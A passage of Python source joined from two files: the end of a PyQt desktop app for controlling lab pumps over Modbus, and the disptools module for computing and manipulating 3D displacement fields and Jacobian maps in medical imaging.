def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.setWindowTitle("Help")
self.setWindowIcon(icon("help.png"))
self.layout = QGridLayout()
self.help_QTextEdit = QTextEdit('Select Topic')
f = self.font()
f.setFamily('courier new')
f.setPointSize(12)
self.help_QTextEdit.setFont(f)
self.help_QTextEdit.setReadOnly(True)
Highlighter(self.help_QTextEdit.document())
self.help_QListWidget = QListWidget()
self.help_QListWidget.setMaximumWidth(200)
self.help_QListWidget.setAcceptDrops(False)
self.help_QListWidget.doubleClicked.connect(self.topic)
self.help_QListWidget.setSelectionMode(QAbstractItemView.SelectionMode.ContiguousSelection)
self.ok_QPushButton = QPushButton("Ok")
self.ok_QPushButton.clicked.connect(self.hide)
self.layout.addWidget(self.help_QTextEdit, 1, 1)
self.layout.addWidget(self.help_QListWidget, 1, 0)
self.layout.addWidget(self.ok_QPushButton, 3, 0)
w = QWidget()
w.setLayout(self.layout)
self.setCentralWidget(w)
self.add_list()
def add_list(self, items=None):
if items is None:
items = ['ModbusBuilder', 'PumpModbusCommandSender', 'PortManger']
for i, j in enumerate(items):
l = QListWidgetItem(j)
self.help_QListWidget.insertItem(i + 1, l)
def topic(self, s):
text_0 = """
This class is used as ModBus Message builder
class modbus. ModbusBuilder
__init__()
build_start ()
build start ModBus message
build_stop ()
build stop ModBus message
build_flow_direction (direction="cw")
build start ModBus
Parameter: direction(str) : flow direction, “cw”, “ccw’
build_change_speed (new_speed=0)
Parameter: direction(float) : pump speed in rpm,
build speed ModBus message
get_modbus
Getter (property): Get the modbus last built.
Return type: str"""
text_1 = """This class is used as to send ModBus message though usb port
class control_api. PumpModbusCommandSender
__init__()
send_pump (data, send_to)
send a specific message to a specified port
Parameter: data(bytearrey):contian the message
send_to(str) : port, Ex[COM1, COM4]
Return type: None"""
text_2 = """This class is used to mange ports
class control_api. PortManger
__init__(remote=False, s="USB-SERIAL CH340")
get_ports_list
Getter (property): Get all Port list.
Return type: list
get_all_pump_ports_list
Getter (property): Get only pumps Port list.
Return type: list
get_number_of_pump_connected
Getter (property): Get number of pumps connected.
Return type: int"""
if s.row() == 0:
self.help_QTextEdit.setText(text_0)
elif s.row() == 1:
self.help_QTextEdit.setText(text_1)
elif s.row() == 2:
self.help_QTextEdit.setText(text_2)
def sizeHint(self):
return QSize(400, 500)
class AboutAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("About")
self.triggered.connect(self.clicked)
def clicked(self):
browser = QWebEngineView()
browser.setUrl('https://github.com/Mohamed-Nser-Said/RDF_project')
self.parent().add_sub_win(browser)
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.remote = False
self.project_name = None
self.RemoteManger = None
self.setDocumentMode(True)
self.setWindowTitle("RedoX App 2.1")
self.setWindowIcon(icon("app.png"))
self.label = Label(text="Create New Project Ctrl+N")
self.setCentralWidget(self.label)
self.mdi = QMdiArea()
# QDocks
self.PumpQWidget = PumpQWidget()
self.PumpQWidget_dock = CreateDockWindows(title="Pump control", parent=self, widget=self.PumpQWidget,
area=Qt.RightDockWidgetArea | Qt.BottomDockWidgetArea)
self.FileTreeViewer = FileTreeViewer(self)
self.FileTreeViewer_dock = CreateDockWindows(title="File Tree", parent=self, widget=self.FileTreeViewer,
area=Qt.LeftDockWidgetArea)
self.SCPICommandLine = SCPICommandLine()
self.SCPICommandLine_dock = CreateDockWindows(title="SCPI Command Line", parent=self,
widget=self.SCPICommandLine,
area=Qt.BottomDockWidgetArea | Qt.TopDockWidgetArea)
self.addDockWidget(Qt.RightDockWidgetArea, self.PumpQWidget_dock)
self.addDockWidget(Qt.LeftDockWidgetArea, self.FileTreeViewer_dock)
self.addDockWidget(Qt.BottomDockWidgetArea, self.SCPICommandLine_dock)
# all actions
self.help_action = HelpAction(self)
self.about_action = AboutAction(self)
self.monitor = MonitorAction(self)
self.dark_mode_action = DarkModeAction()
self.NewProjectAction = NewProjectAction(self)
self.OpenProjectAction = OpenProjectAction(self)
self.CreatNewTableAction = CreatNewTableAction(self)
self.CreateNotePadAction = CreateNotePadAction(self)
self.NewTextEditorAction = NewTextEditorAction(self)
self.StepFunctionAction = StepFunctionAction(self)
self.OpenGraphAction = OpenGraphAction(self)
self.RemoteAction = RemoteAction(self)
self.NewGraphAction = NewGraphAction(self)
# signals and slots
self.CreateNotePadAction.CreateNewNoteClicked.connect(self.add_sub_win)
self.FileTreeViewer.FileOpenedSignal.connect(self.file_opened)
self.NewProjectAction.NewProjectAddedSignal.connect(self.project_manger)
self.OpenProjectAction.OpenProjectActionClickedSignal.connect(self.project_manger)
self.pump_single_receiver = PumpSingleReceiver()
self.PumpQWidget.PumpSignalSend.connect(self.pump_single_receiver.data_manger)
self.RemoteAction.triggered.connect(self.remote_activated)
# self.RemoteAction.triggered.connect(self.remote_trigger)
# self.CreatNewTableAction.NewTableCreatedSignal.connect(self.NewProjectTab.append_new_tabel)
# Toolbar and menu bar
self.menu = self.menuBar()
self.file = self.menu.addMenu("File")
self.file.addAction(self.NewProjectAction)
self.file.addAction(self.OpenProjectAction)
self.tools = self.menu.addMenu("Tools")
self.tools.addAction(self.CreateNotePadAction)
self.tools.addAction(self.StepFunctionAction)
self.tools.addAction(self.NewTextEditorAction)
self.tools.addAction(self.monitor)
self.view = self.menu.addMenu("View")
self.appearance = self.view.addMenu("Appearance")
self.appearance.addAction(self.dark_mode_action)
self.table = self.menu.addMenu("Tables")
self.table.addAction(self.CreatNewTableAction)
self.graph = self.menu.addMenu("Graph")
self.graph.addAction(self.NewGraphAction)
self.graph.addAction(self.OpenGraphAction)
self.remote_menu = self.menu.addMenu("Remote")
self.remote_menu.addAction(self.RemoteAction)
self.help = self.menu.addMenu("Help")
self.help.addAction(self.help_action)
self.help.addAction(self.about_action)
self.toolbar = QToolBar("main toolbar")
self.toolbar.setIconSize(QSize(16, 16))
self.addToolBar(self.toolbar)
self.toolbar.addAction(self.NewProjectAction)
self.toolbar.addAction(self.OpenProjectAction)
self.toolbar.addAction(self.CreateNotePadAction)
self.toolbar.addAction(self.NewTextEditorAction)
self.toolbar.addSeparator()
self.toolbar.addAction(self.dark_mode_action)
self.toolbar.addSeparator()
self.project_toolbar = QToolBar("project")
# self.addToolBar(Qt.RightToolBarArea, self.project_toolbar)
self.addToolBar(self.project_toolbar)
self.project_toolbar.setIconSize(QSize(16, 16))
self.project_toolbar.setMovable(False)
self.project_toolbar.addAction(self.CreatNewTableAction)
self.setStatusBar(QStatusBar(self))
self.set_disable_enable_widgets(True)
def sizeHint(self):
return QSize(1080, 650)
def project_manger(self, name):
self.set_disable_enable_widgets(False)
self.project_name = name
self.setWindowTitle(f"RedoX App 2.1 [{name}]")
self.FileTreeViewer.project_name = name
self.FileTreeViewer.new_project_added()
def set_disable_enable_widgets(self, state):
self.remote_menu.setDisabled(state)
self.tools.setDisabled(state)
self.SCPICommandLine.setDisabled(state)
self.CreateNotePadAction.setDisabled(state)
self.FileTreeViewer.setDisabled(state)
self.graph.setDisabled(state)
self.table.setDisabled(state)
self.PumpQWidget.setDisabled(state)
self.CreatNewTableAction.setDisabled(state)
if not state:
self.setCentralWidget(self.mdi)
def add_sub_win(self, obj):
sub = QMdiSubWindow()
sub.setWindowIcon(icon("new_project.png"))
sub.setWidget(obj)
self.mdi.addSubWindow(sub)
sub.show()
def file_opened(self, file):
if file['file_type'] == '.txt':
obj = NotePad()
obj.note_open(file['file_path'], file['file_name'])
self.add_sub_win(obj)
elif file['file_type'] == '.py':
obj = TextEditor()
obj.procedure_open(file['file_path'], file['file_name'])
self.add_sub_win(obj)
elif file['file_type'] == '.png':
obj = GraphViewer(file['file_path'])
self.add_sub_win(obj)
def remote_activated(self):
if self.RemoteManger is None:
try:
self.RemoteManger = RemoteManger()
except Exception as e:
self.error_message(str(e))
if self.RemoteManger is not None:
self.add_sub_win(RemoteControlPanel(self))
self.PumpQWidget.connection_mode_QComboBox.setDisabled(False)
def error_message(self, s):
dlg = QMessageBox(self)
dlg.setText(s)
dlg.setIcon(QMessageBox.Critical)
dlg.show()
if __name__ == "__main__":
app = QApplication(sys.argv) # 1 we start the event loop
app.setStyle('Fusion') # 2 we set the Fusion style
window = MainWindow() # we make an instance of the mainWindow class
window.show() # we need to show the window
app.exec_() # lastly excute the app
|
displacements.py
|
import math
import os
import re
import sys
import threading
import warnings
from functools import reduce
from glob import glob
from typing import *
import numpy as np
import scipy.interpolate
import SimpleITK as sitk
from disptools import *
import disptools.drawing as drawing
import disptools.io as io
import _disptools
def regularise(jacobian: sitk.Image, epsilon: float = 1e-5) -> sitk.Image:
r""" Regularise the Jacobian, removing singularities.
Given a 3D scalar image, replace all the entries that are smaller
than `epsilon` with `epsilon`.
Parameters
----------
jacobian : sitk.Image
Input Jacobian map
epsilon : float
Lower threshold for the Jacobian.
Returns
-------
sitk.Image
Thresholded Jacobian.
"""
jacobian = sitk.Cast(jacobian, sitk_float_type)
if (3 != len(jacobian.GetSize())):
raise Exception("Wrong jacobian dimensionality")
# Object for the result
result = sitk.Image(jacobian)
# Call function from the underlying C library
_disptools.regularise(sitk.GetArrayViewFromImage(result), epsilon)
return result
def jacobian(field: sitk.Image) -> sitk.Image:
r""" Compute the Jacobian map of a vector field.
Parameters
----------
field : sitk.Image
Input vector field.
Returns
-------
sitk.Image
The Jacobian of the given vector field.
"""
field = sitk.Cast(field, sitk_vector_float_type)
image = sitk.GetArrayViewFromImage(field)
if 4 != len(image.shape) or 3 != image.shape[3]:
raise Exception("Wrong input dimensionality")
# Convert to the library's memory layout
shape = image.shape[0:3]
image_data = np.empty((3, *shape), dtype=np_float_type)
image_data[0,:,:,:] = image[:,:,:,0]
image_data[1,:,:,:] = image[:,:,:,1]
image_data[2,:,:,:] = image[:,:,:,2]
# Object for the result
result = np.zeros(shape, dtype=np_float_type)
# Call function from the underlying C library
_disptools.jacobian(field.GetSpacing(), image_data, result)
result = sitk.GetImageFromArray(result)
result.CopyInformation(field)
return result
# This function wraps the C call.
def _displacement(
image : sitk.Image,
mask : sitk.Image = None,
initial_guess : sitk.Image = None,
epsilon : float = 9.99e-4,
tolerance : float = 0.2,
it_max : int = 50000,
alpha : float = 1.2,
beta : float = 0.5,
gamma : float = .1,
delta : float = 1e-3,
zeta : float = 100.0,
theta : float = 1e-6,
iota : float = 1e-9,
strict : bool = False,
eta : float = 0.1,
eta_max : float = 0.4,
algorithm : str = 'gradient',
gpu_id : int = -1,
):
r""" Compute a displacement field that realises a prescribed Jacobian.
.. note::
This function should not be called directly. Please use its wrapper `displacement'.
Parameters
---------
See the documentation for `displacement`.
Returns
-------
sitk.Image
A displacement field whose Jacobian matches the input.
"""
jacobian = sitk.GetArrayViewFromImage(image).astype(np_float_type, copy=True)
if mask == None:
# Default mask: whole image
mask = np.ones(jacobian.shape, dtype=np.bool)
else:
# Get mask as numpy array of booleans
mask = sitk.GetArrayViewFromImage(mask).astype(bool, copy=True)
if mask.shape != jacobian.shape:
raise Exception("The shapes of the Jacobian and the mask must agree")
# Create objects for the result, initialise initial guess
if initial_guess is not None:
data = sitk.GetArrayViewFromImage(initial_guess)
if data.shape[0:3] != jacobian.shape:
raise Exception("The shapes of the Jacobian and the initial guess must agree")
field_tmp = np.empty((3, *jacobian.shape), dtype=np_float_type)
field_tmp[0,:,:,:] = data[:,:,:,0]
field_tmp[1,:,:,:] = data[:,:,:,1]
field_tmp[2,:,:,:] = data[:,:,:,2]
else:
field_tmp = np.zeros((3, *jacobian.shape), dtype=np_float_type)
# Arguments
args = [
image.GetSpacing(),
jacobian,
mask,
epsilon,
tolerance,
eta,
eta_max,
alpha,
beta,
gamma,
delta,
zeta,
theta,
iota,
strict,
it_max,
field_tmp,
algorithm,
gpu_id,
]
# Call the function in a separate thread
#
# The thread cannot actually be killed from the REPL while busy, but
# at least this way the REPL can handle SIGINT. Using a process
# instead of a thread would allow to kill the call, but it does not
# work in the REPL, so there is no point.
#
# The real solution would be to put a signal handler inside the C
# routines. There are resources to be freed before interrupting, and
# they are shared betweeen OpenMP threads, so it requires to use a
# termination flag inside the OpenMP sections.
t = threading.Thread(target=_disptools.displacement, args=args, daemon=True)
t.start()
t.join()
# Convert to ITK's image memory layout
field = np.empty((*jacobian.shape, 3), dtype=np_float_type)
field[:,:,:,0] = field_tmp[0,:,:,:]
field[:,:,:,1] = field_tmp[1,:,:,:]
field[:,:,:,2] = field_tmp[2,:,:,:]
# Convert the result to match the input type
field = sitk.GetImageFromArray(field)
field.CopyInformation(image)
return field
def redistribute_volume_change(image: sitk.Image, mask: sitk.Image) -> sitk.Image:
r""" Redistribute the volume change over the image.
Redistribute the change of volume within the body on the background,
and enforce the total volume change over the entire image to be zero.
Parameters
----------
image : sitk.Image
Input Jacobian.
mask : sitk.Image
Binary mask of the body volume.
Returns
-------
sitk.Image
A new Jacobian map with redistributed volume changes.
"""
data = sitk.GetArrayFromImage(image)
index = sitk.GetArrayViewFromImage(mask)
correction = -(np.sum(data) - data.size) / (data.size - np.count_nonzero(index))
data[index == 0.0] += correction
result = sitk.GetImageFromArray(data)
result.CopyInformation(image)
return result
# This function is a wrapper of `_displacement()` that adds padding/cropping
# and handles the multi-resolution pyramid.
def displacement(
jacobian : sitk.Image,
*,
levels : int = 1,
pad : int = 0,
redistribute : bool = False,
mask : sitk.Image = None,
initial_guess : sitk.Image = None,
epsilon : float = 9.99e-4,
tolerance : float = 0.2,
it_max : Union[int, List[int]] = 50000,
alpha : float = 1.2,
beta : float = 0.5,
gamma : float = 0.1,
delta : float = 1e-3,
zeta : float = 10.0,
theta : float = 1e-6,
iota : float = 1e-9,
strict : bool = False,
eta : float = 0.1,
eta_max : float = 0.4,
algorithm : str = 'gradient',
gpu_id : int = -1
) -> sitk.Image:
r""" Generate a displacement field that realises a given Jacobian.
Given a 3D scalar image encoding a Jacobian map, compute a
3D vector image encoding a vector field whose Jacobian map
matches the input up to a certain tolerance.
The three algorithms provided are:
* ``gradient``: a gradient descent method (default).
* ``greedy``: a greedy search method based on the method proposed in [1]_.
* ``matching``: a volume matching routine based on gradient descent,
published in [2]_ and [3]_. The implementation comes from
the `atrophysim tool`_.
The initial value of the step length in the gradient descent is
given by the parameter ``eta``. The ``gradient`` and ``matching``
algorithms use an `Armijo condition`_ to control the step length,
in the form
.. math::
E(d - \eta \nabla E(d)) - E(d) \le -\gamma \eta ||\nabla E(d)||^2
where :math:`d` is the displacement, :math:`E` the loss function,
:math:`\eta` the current step length, and :math:`\gamma \in (0, 1)` a
parameter of the condition. At each iteration the step length is increased
multiplying it by ``alpha``, and if the Armijo condition is not met after
the update, ``eta`` is decreased multiplying it by ``beta`` until the
truth of the inequality in the Armijo condition is restored. A maximum
value for ``eta`` can be set through the parameter ``eta_max``.
The ``gradient`` and ``matching`` algorithms have a regularisation term
that penalises values of the Jacobian below a certain threshold, given
by ``delta``. The importance of the regularisation term is controlled
by the parameter ``zeta`` (set to ``0`` to have no regularisation).
Termination is controlled by a condition on the improvement on the result
and one on the step length. If the percentual improvement of the cost
drops below the value given by ``theta``, the algorithm terminates.
Termination happens also if the step length becomes smaller than
``iota``.
.. _atrophysim tool: https://www.nitrc.org/projects/atrophysim
.. _Armijo condition: https://en.wikipedia.org/wiki/Wolfe_conditions
.. note::
The displacement is generally not accurate on image boundary voxels.
.. note::
The C verbose output is written to `stdout`. If you want to capture
it from within Python, the `wurlitzer package`_ might be helpful.
.. warning::
This function calls a C routine which cannot be interrupted from
the REPL.
.. _wurlitzer package: https://github.com/minrk/wurlitzer
References
----------
.. [1] van Eede, M. C., Scholz, J., Chakravarty, M. M., Henkelman, R. M., and Lerch, J. P.
"Mapping registration sensitivity in MR mouse brain images." Neuroimage 82 (2013), 226–236.
.. [2] Karaçali, B., and Davatzikos, C. "Estimating topology preserving and smooth displacement fields."
IEEE Transactions on Medical Imaging 23, 7 (2004), 868–880.
.. [3] Karaçali, B., and Davatzikos, C. "Simulation of tissue atrophy using a topology preserving
transformation model." IEEE transactions on medical imaging 25, 5 (2006), 649–652.
Parameters
----------
jacobian : sitk.Image
Input Jacobian.
levels : int
Number of levels in the multi-resolution pyramid; the size of
the image along each direction is halven at each level.
pad : int
Thickness of the zero-padding around the volume (0 for
the mask, 1.0 for the Jacobian) to be used during the
computation. The padding is removed before returning the result.
redistribute : bool
Redistribute the volume change inside the mask to the background.
mask : sitk.Image
Binary mask for the region of interest.
initial_guess : sitk.Image
Initial estimation of the solution. The default is a null
displacement field.
epsilon : float
A floating point value, representing the tolerance per
voxel on the Jacobian of the resulting field.
tolerance : float
Tolerance on Jacobian outside the mask.
it_max : Union[int, List[int]]
Maximum number of iterations allowed. If it is a list, its
length must match the number of levels in the multi-resolution
pyramid, and each value is used for a single level, with the
first element of the list representing the level with lowest
resolution. If it is a scalar, then the same number of
iterations is used for all pyramid levels.
alpha : float
Coefficient that controls the increase of the step length.
beta : float
Coefficient that controls the decrease of the step length.
gamma : float
Armijo-Goldstein parameter.
delta : float
Lower threshold for Jacobian regularisation.
zeta : float
Weight for the regularisation term.
theta : float
Terminate if the percentage improvement of the cost per
iteration drops below this value.
iota : float
Terminate if the step length drops below this value.
strict : bool
If True, reject iterations that not decrease the maximum
voxel error.
eta : float
Initial step length.
eta_max : float
Maximum step length allowed.
algorithm : str
Algorithm to generate the field, one of `greedy`, `gradient`, or `matching`.
gpu_id : int
Id of the CUDA device used to run the GPU implementation. If
equal to `-1`, the CPU implementation is used instead. Requires
a build of disptools with CUDA support enabled.
Returns
-------
sitk.Image
A displacement field whose Jacobian matches the input.
"""
# Filter parameters used locally and parameters propagated to the
# wrapped function
parameters = locals().copy()
used = ['jacobian', 'levels', 'pad', 'redistribute', 'mask',
'initial_guess', 'it_max']
[parameters.pop(p) for p in used]
jacobian = sitk.Cast(jacobian, sitk_float_type)
if mask is None:
mask = np.ones(tuple(reversed(jacobian.GetSize())), dtype=np_float_type)
mask = sitk.GetImageFromArray(mask)
mask.CopyInformation(jacobian)
else:
mask = sitk.Cast(mask, sitk_float_type)
size = jacobian.GetSize()
origin = jacobian.GetOrigin()
spacing = jacobian.GetSpacing()
direction = jacobian.GetDirection()
# Ensure consistency of the coordinate system
def make_consistent(img, name, interpolator):
if img is None:
return img
inconsitent = []
if img.GetSize() != size:
inconsitent.append('size')
if img.GetOrigin() != origin:
inconsitent.append('origin')
if img.GetSpacing() != spacing:
inconsitent.append('spacing')
if img.GetDirection() != direction:
inconsitent.append('direction')
if inconsitent != []:
inconsitent = ' and '.join(inconsitent)
warnings.warn("%s of '%s' " % (inconsitent, name) +
"inconsistent with the Jacobian, " +
"resampling to a common coordinate space")
if interpolator != sitk.sitkNearestNeighbor:
img = sitk.SmoothingRecursiveGaussian(img, 2.0)
return sitk.Resample(img, jacobian, sitk.Transform(), interpolator)
else:
return img
mask = make_consistent(mask, 'mask', sitk.sitkNearestNeighbor)
initial_guess = make_consistent(initial_guess, 'initial_guess', sitk.sitkLinear)
# Add a voxel of zero-flux padding anyway since the algorithm
# will not compute the displacement field on boundary voxels
if pad > 0:
pad += 1
else:
pad = 1
pad = ((pad, pad, pad), (pad, pad, pad))
if redistribute:
jacobian = redistribute_volume_change(jacobian, mask)
mask = sitk.ConstantPad(mask, *pad, 0)
jacobian = sitk.ZeroFluxNeumannPad(jacobian, *pad)
# Create image pyramid
jacobian_pyramid = [jacobian]
mask_pyramid = [mask]
for i in range(1, levels):
new_size = tuple(map(lambda x: x // 2, jacobian_pyramid[i-1].GetSize()))
jacobian_pyramid.append(drawing.scale_image(jacobian, new_size))
mask_pyramid.append(drawing.scale_image(mask, new_size, sitk.sitkNearestNeighbor))
# Set maximum number of iterations for each pyramid level
if not isinstance(it_max, list):
it_max = [it_max for i in range(levels)]
elif len(it_max) != levels:
raise ValueError('len(it_max) should equal the value of `levels`')
# Set initial guess
field = initial_guess
# Multi-resolution algorithm
for jacobian, mask, it in zip(jacobian_pyramid[::-1], mask_pyramid[::-1], it_max):
size = jacobian.GetSize()
logging.info('Size %s' % str(size))
field = drawing.scale_image(field, size) if field is not None else None
field = _displacement(jacobian, mask, initial_guess=field, it_max=it, **parameters)
# Remove padding from the result
field = sitk.Crop(field, *pad)
field.SetOrigin(origin)
field.SetSpacing(spacing)
field.SetDirection(direction)
return field
def average_jacobian_from_displacements(input_filenames_pattern: str, epsilon: float = 1e-5) -> sitk.Image:
r""" Compute the average Jacobian of a set of displacement fields.
This function reads a collection of displacement fields from files
(``rvf`` or any other format readable by SimpleITK) and computes
the average Jacobian of the deformation associated to them
(defined as the geometric mean computed under logarithm).
It accepts a string argument containing a `glob pattern`_ to the
input displacement files, and a second optional argument setting
a minimum threshold for the Jacobian.
For instance, assuming there is a folder ``/home/user/my_displacements``
containing a set of displacement fields in ``vtk`` format, the average
Jacobian can be computed with
>>> average_jacobian = disptools.displacements.average_jacobian_from_displacements('/home/user/my_jacobians/*.vtk')
The average Jacobian is defined as the geometric mean computed under
logarithm.
.. _glob pattern: https://en.wikipedia.org/wiki/Glob_(programming)
Parameters
----------
input_filenames_pattern : str
A glob pattern for the displacement files in RVF or another
format readable by SimpleITK.
epsilon : float
Minimum threshold for the Jacobian, all values below `epsilon`
will be replaced with `epsilon`.
Returns
-------
sitk.Image
The average Jacobian of the given displacements.
"""
total_jacobian = None
filenames = glob('%s' % input_filenames_pattern)
n = len(filenames)
logging.debug('Files to process: %d' % n)
logging.debug('Starting')
i = 1
for f in filenames:
logging.debug('Processing file %3d/%d %s' % (i, n, f))
try:
file_format = re.match(r'.*\.([^.]+)$', f).group(1)
except:
logging.debug('Skipping file %s' %i)
continue
if file_format == 'rvf':
I = io.read_rvf(f)
else:
I = sitk.ReadImage(f)
J = jacobian(I)
J = regularise(J, epsilon)
if total_jacobian is None:
total_jacobian = np.zeros(tuple(reversed(I.GetSize())), dtype=np_float_type)
total_jacobian += np.log(sitk.GetArrayViewFromImage(J))
i += 1
average_jacobian = np.exp(1.0/n * total_jacobian)
output_jacobian = sitk.GetImageFromArray(average_jacobian)
output_jacobian.CopyInformation(I)
return output_jacobian
def average_jacobian(input_filenames_pattern: str, epsilon: float = 1e-5) -> sitk.Image:
r""" Compute the average of a set of Jacobians.
This function reads a collection of Jacobian maps from files (any format
readable by SimpleITK) and computes their average Jacobian (defined as the
geometric mean computed under logarithm). It accepts a string argument
containing a `glob pattern`_ to the input files, and a second optional
argument setting a minimum threshold for the Jacobian.
For instance, assuming there is a folder ``/home/user/my_jacobians``
containing a set of Jacobian maps in ``vtk`` format, the average can
be computed with
>>> average_jacobian = disptools.displacements.average_jacobian('/home/user/my_jacobians/*.vtk')
The average Jacobian is defined as the geometric mean computed under
logarithm.
.. _glob pattern: https://en.wikipedia.org/wiki/Glob_(programming)
Parameters
----------
input_filenames_pattern : str
A glob pattern for the displacement files in a format
readable by SimpleITK.
epsilon : float
A lower threshold for the Jacobian, all values below `epsilon`
will be replaced with `epsilon`.
Returns
-------
sitk.Image
The geometric mean of the input Jacobian maps.
"""
total_jacobian = None
filenames = glob('%s' % input_filenames_pattern)
n = len(filenames)
logging.debug('Files to process: %d' % n)
logging.debug('Starting')
i = 1
for f in filenames:
logging.debug('Processing file %3d/%d %s' % (i, n, f))
image = sitk.Cast(sitk.ReadImage(f), sitk_float_type)
image = sitk.Threshold(image, lower=epsilon, upper=1e9, outsideValue=epsilon)
jacobian = sitk.GetArrayFromImage(image)
if total_jacobian is None:
total_jacobian = np.zeros(jacobian.shape, dtype=jacobian.dtype)
total_jacobian += np.log(jacobian)
i += 1
average_jacobian = np.exp(1.0/n * total_jacobian)
output_jacobian = sitk.GetImageFromArray(average_jacobian)
output_jacobian.CopyInformation(image)
return output_jacobian
def jacobian_to_volume_change(jacobian: sitk.Image, epsilon: float = 1e-5) -> sitk.Image:
r""" Convert a Jacobian map to a volume change map.
A volume change map is defined as
.. math::
VC[f](x) =
\begin{cases}
1 - \frac{1}{J[f](x)} \quad &J[f](x) \in (0,1) \\
J[f](x) - 1 \quad &J[f](x) \ge 1
\end{cases}
Parameters
----------
jacobian : sitk.Image
Input Jacobian map.
epsilon : float
Lower threshold for the Jacobian; any value below
`epsilon` will be replaced with `epsilon`.
Returns
-------
sitk.Image
Volume change map associated to the input Jacobian.
"""
data = sitk.GetArrayFromImage(jacobian)
processed = np.empty(data.shape, dtype=data.dtype)
ind_expa = data >= 1.0
ind_comp = data < 1.0
ind_sing = data <= epsilon
data[ind_sing] = epsilon
processed[ind_expa] = data[ind_expa] - 1.0
processed[ind_comp] = 1.0 - (1.0 / data[ind_comp])
result = sitk.GetImageFromArray(processed)
result.CopyInformation(jacobian)
return result
def volume_change_to_jacobian(volume_change: sitk.Image) -> sitk.Image:
r""" Convert a volume change map to a Jacobian map.
A volume change map is defined as
.. math::
VC[f](x) =
\begin{cases}
1 - \frac{1}{J[f](x)} \quad &J[f](x) \in (0,1) \\
J[f](x) - 1 \quad &J[f](x) \ge 1
\end{cases}
Parameters
----------
volume_change : sitk.Image
Input volume change map.
Returns
-------
sitk.Image
A Jacobian map associated to the input volume changes.
"""
data = sitk.GetArrayViewFromImage(volume_change)
processed = np.empty(data.shape, dtype=data.dtype)
ind_expa = data >= 0.0
ind_comp = data < 0.0
processed[ind_expa] = data[ind_expa] + 1.0
processed[ind_comp] = -1.0 / (data[ind_comp] - 1.0)
result = sitk.GetImageFromArray(processed)
result.CopyInformation(volume_change)
return result
def deformation_to_displacement(deformation: sitk.Image) -> sitk.Image:
r""" Convert a deformation field to a displacement field.
A deformation field :math:`D` is given by the sum of the identity
transform and a displacement field :math:`d`:
.. math::
D(x) = x + d(x)
Parameters
----------
deformation :
Input deformation field.
Returns
-------
sitk.Image
Displacement field associated to the deformation.
"""
a = sitk.GetArrayFromImage(deformation)
for x, y, z in np.ndindex(deformation.GetSize()):
a[z,y,x,0] -= x
a[z,y,x,1] -= y
a[z,y,x,2] -= z
displacement = sitk.GetImageFromArray(a)
displacement.CopyInformation(deformation)
return displacement
def compose_displacements(*fields: sitk.Image) -> sitk.Image:
r""" Compose multiple displacement fields.
Compute the composition pairwise and iteratively. For a couple
of displacements :math:`d_1` and :math:`d_2`
associated to the transforms :math:`f_1` and :math:`f_2`, the
composition
.. math::
(f_2 \circ f_1) (x) = f_2(f_1(x))
is obtained by resampling :math:`d_2` with :math:`d_1` and then
summing.
Parameters
----------
fields : sitk.Image
Variadic list of displacement fields.
Returns
-------
sitk.Image
The composition of the input displacement fields.
"""
fields = list(fields)
total_field = sitk.Image(fields.pop(0))
for field in fields:
resampled_field = sitk.Warp(field,
total_field,
outputSize=total_field.GetSize(),
outputSpacing=total_field.GetSpacing(),
outputOrigin=total_field.GetOrigin(),
outputDirection=total_field.GetDirection())
resampled_field.CopyInformation(total_field)
total_field = sitk.Add(total_field, resampled_field)
return total_field
def decompose_displacements(
field1: sitk.Image,
field2: sitk.Image
) -> sitk.Image:
r""" Decompose two displacement fields.
Given two displacement fields :math:`d_1` and :math:`d_2`
associated to the transforms :math:`f_1` and :math:`f_2`,
find a third displacement :math:`d_3` associated to the
transform :math:`f_3`, such that
.. math::
f_1 &= f_3 \circ f_2 \\
d_1(x) &= d_2(x) + d_3(d_2(x))
Parameters
----------
field1 : sitk.Image
Total displacement.
field2 : sitk.Image
Component to be decomposed from the total displacement.
Returns
-------
sitk.Image
A vector image representing a displacement field such
that its composition with the second argument gives
the first argument.
"""
field3 = sitk.Warp(field1 - field2,
sitk.InvertDisplacementField(field2),
outputSize=field1.GetSize(),
outputSpacing=field1.GetSpacing(),
outputOrigin=field1.GetOrigin(),
outputDirection=field1.GetDirection())
field3.CopyInformation(field1)
return field3
def field_zero_padding(
field : sitk.Image,
size_x : Tuple[int,int] = (1,1),
size_y : Tuple[int,int] = (1,1),
size_z : Tuple[int,int] = (1,1)
) -> sitk.Image:
r""" Add a zero padding to a vector field.
Set the zero padding manually, since `sitk.ConstantPad()` does not
support vector images.
Parameters
----------
field : sitk.Image
Input vector field.
size_x : (int, int)
Amount of padding at the beginning and end of x direction.
size_y : (int, int)
Amount of padding at the beginning and end of y direction.
size_z : (int, int)
Amount of padding at the beginning and end of z direction.
Returns
-------
sitk.Image
A padded vector field.
"""
a = np.lib.pad(sitk.GetArrayViewFromImage(field),
(size_x, size_y, size_z, (0,0)),
'constant',
constant_values=0.0)
field_pad = sitk.GetImageFromArray(a)
field_pad.SetSpacing(field.GetSpacing())
field_pad.SetOrigin(field.GetOrigin())
field_pad.SetDirection(field.GetDirection())
return field_pad
def invert_displacement_padded(field: sitk.Image) -> sitk.Image:
r""" Invert a displacement field using one voxel of padding in the computation.
Parameters
----------
field : sitk.Image
Input displacement field.
Returns
-------
sitk.Image
The inverse of the displacement, computed under padding.
"""
inverse = sitk.InvertDisplacementField(field_zero_padding(field))
inverse = sitk.Crop(inverse, (1,1,1), (1,1,1))
inverse.CopyInformation(field)
return inverse
def warp_points_by_displacement(
points : np.ndarray,
displacement : sitk.Image
) -> np.ndarray:
r""" Warp a set of Elastix points by a displacement field.
Parameters
----------
points : np.ndarray
A :math:`n \times m` array representing :math:`n` points
with :math:`m` components.
displacement : sitk.Image
Displacement field.
Returns
-------
np.ndarray
An array representing the warped points.
"""
data = sitk.GetArrayViewFromImage(displacement)
(ox, oy, oz) = displacement.GetOrigin()
(nx, ny, nz) = displacement.GetSize()
(sx, sy, sz) = displacement.GetSpacing()
x = np.linspace(ox, (nx-1) * sx, nx)
y = np.linspace(oy, (ny-1) * sy, ny)
z = np.linspace(oz, (nz-1) * sz, nz)
# NOTE: ITK images are indexed as [z,y,x]
f = scipy.interpolate.RegularGridInterpolator((z, y, x),
data,
bounds_error=False)
p = np.empty(points.shape)
